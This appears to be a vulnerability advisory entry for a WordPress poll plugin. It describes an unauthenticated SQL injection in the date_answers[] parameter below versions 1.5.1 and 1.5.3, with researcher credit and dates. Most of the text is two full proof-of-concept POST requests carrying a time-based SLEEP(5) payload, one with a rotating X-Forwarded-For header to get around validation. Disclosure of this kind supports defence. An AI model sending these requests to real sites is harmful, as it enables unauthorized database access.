The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
v < 1.5.3 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done] Cookie: [any user, authenticated or not] Connection: close question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5) v < 1.5.1 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Cookie: [any user, authenticated or not] Connection: close question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)
Toby Jackson
Toby Jackson
Yes
2021-06-22 (about 1 years ago)
2021-06-22 (about 1 years ago)
2022-01-17 (about 5 months ago)